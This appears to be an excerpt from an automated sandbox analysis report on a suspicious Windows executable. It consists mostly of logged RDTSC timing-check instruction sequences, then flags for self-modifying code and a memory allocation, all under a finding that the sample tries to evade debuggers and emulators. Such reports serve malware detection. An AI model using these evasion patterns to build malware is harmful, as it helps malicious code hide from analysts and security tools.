Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E8D69 second address: 11E8D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E8D6D second address: 11E8D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E8D71 second address: 11E8DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FEE70h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD6F84FEE72h 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E907B second address: 11E90A5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FD6F84FD82Dh 0x00000010 jmp 00007FD6F84FD827h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E90A5 second address: 11E90C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD6F84FEE66h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD6F84FEE72h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11EC932 second address: 11EC93C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD6F84FD816h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11ECAA2 second address: 11ECAB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FEE6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11ECC44 second address: 11ECC68 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD6F84FD828h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11ECC68 second address: 11ECC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11ECDB0 second address: 11ECDBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD6F84FD816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11ECDBA second address: 11ECDC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11F1ABB second address: 11F1AC1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11F1CA2 second address: 11F1CDB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD6F84FEE72h 0x00000008 jmp 00007FD6F84FEE6Ah 0x0000000d pushad 0x0000000e popad 0x0000000f jnp 00007FD6F84FEE73h 0x00000015 jmp 00007FD6F84FEE6Dh 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jno 00007FD6F84FEE6Eh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11F1FBA second address: 11F1FC8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11F1FC8 second address: 11F1FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11F1FCC second address: 11F1FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD6F84FD81Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11F1FE3 second address: 11F2006 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD6F84FEE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FD6F84FEE74h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119734F second address: 11973C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edx, dword ptr [ebp+122D3904h] 0x00000014 mov edi, dword ptr [ebp+122D33EFh] 0x0000001a mov ebx, dword ptr [ebp+1248050Ah] 0x00000020 mov dx, D14Bh 0x00000024 add eax, ebx 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FD6F84FD818h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 mov dword ptr [ebp+1247144Fh], ecx 0x00000046 nop 0x00000047 je 00007FD6F84FD822h 0x0000004d jns 00007FD6F84FD81Ch 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FD6F84FD827h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11F22E1 second address: 11F22F0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD6F84FEE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11F22F0 second address: 11F22F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11F53F3 second address: 11F5406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FEE6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11F5406 second address: 11F540C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11FB9E0 second address: 11FB9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007FD6F84FEE7Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FD6F84FEE66h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11FB9F4 second address: 11FB9F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11FBFC8 second address: 11FBFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11FBFCE second address: 11FBFD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11FBFD2 second address: 11FBFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11FC2A1 second address: 11FC2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11FC5A8 second address: 11FC5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11FD2FE second address: 11FD302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11FD5FA second address: 11FD604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11FD604 second address: 11FD60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1207713 second address: 1207717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1206E25 second address: 1206E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1206E29 second address: 1206E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1206F71 second address: 1206FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FD824h 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007FD6F84FD828h 0x00000010 jmp 00007FD6F84FD81Eh 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 120742F second address: 1207449 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jp 00007FD6F84FEE66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 120B0C9 second address: 120B0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 121233F second address: 1212345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1212345 second address: 1212358 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD6F84FD816h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1212358 second address: 121235D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1212648 second address: 1212673 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jng 00007FD6F84FD816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jnp 00007FD6F84FD849h 0x00000013 jmp 00007FD6F84FD825h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1212D6B second address: 1212D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1212D71 second address: 1212D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1212D75 second address: 1212D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FD6F84FEE66h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1145363 second address: 114538C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD6F84FD829h 0x0000000c pushad 0x0000000d jp 00007FD6F84FD816h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 122AED0 second address: 122AEDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FD6F84FEE66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 122AEDA second address: 122AEE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1238718 second address: 1238722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD6F84FEE66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1238722 second address: 1238726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1238726 second address: 1238730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1238730 second address: 1238734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1238590 second address: 12385A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD6F84FEE6Ah 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12385A1 second address: 12385D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FD827h 0x00000009 jmp 00007FD6F84FD81Ah 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007FD6F84FD816h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12385D3 second address: 12385DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD6F84FEE66h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 123C5F4 second address: 123C5F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 123C5F8 second address: 123C625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD6F84FEE6Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD6F84FEE76h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 123C625 second address: 123C629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1242D98 second address: 1242DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD6F84FEE66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 124167D second address: 1241683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12417CE second address: 12417DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jp 00007FD6F84FEE66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12418F6 second address: 12418FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1241BE9 second address: 1241BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1241BEF second address: 1241BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1241BF3 second address: 1241BF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1242A8A second address: 1242AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FD829h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jmp 00007FD6F84FD823h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 125419C second address: 12541AC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD6F84FEE66h 0x00000008 jp 00007FD6F84FEE66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12574B7 second address: 12574C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FD6F84FD81Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12574C9 second address: 12574CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12574CD second address: 12574D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12574D9 second address: 12574DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12574DF second address: 12574E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1264FAE second address: 1264FB8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD6F84FEE6Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1264FB8 second address: 1264FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FD6F84FD822h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 126C0E6 second address: 126C0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 126C0EA second address: 126C0F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 126C0F0 second address: 126C107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007FD6F84FEE6Bh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 126C107 second address: 126C10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 126B45F second address: 126B47F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD6F84FEE76h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FD6F84FEE6Eh 0x0000000f jc 00007FD6F84FEE6Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 126B5BD second address: 126B5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 126D7E9 second address: 126D7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FD6F84FEE72h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 126D7F6 second address: 126D7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 126D7FC second address: 126D800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12770D0 second address: 12770ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FD829h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12770ED second address: 12770FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 12770FB second address: 1277102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1278FF1 second address: 127903E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FEE78h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e jo 00007FD6F84FEE66h 0x00000014 jnl 00007FD6F84FEE66h 0x0000001a jmp 00007FD6F84FEE77h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007FD6F84FEE66h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 127085A second address: 1270860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1191AA2 second address: 1191AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1191AA6 second address: 1191AAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Special instruction interceptor: First address: FE9A98 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Special instruction interceptor: First address: 118246E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Special instruction interceptor: First address: 11828DB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Special instruction interceptor: First address: 11AF639 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Special instruction interceptor: First address: 121A84E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Special instruction interceptor: First address: FED842 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Memory allocated: 5990000 memory reserve \| memory write watch	Jump to behavior
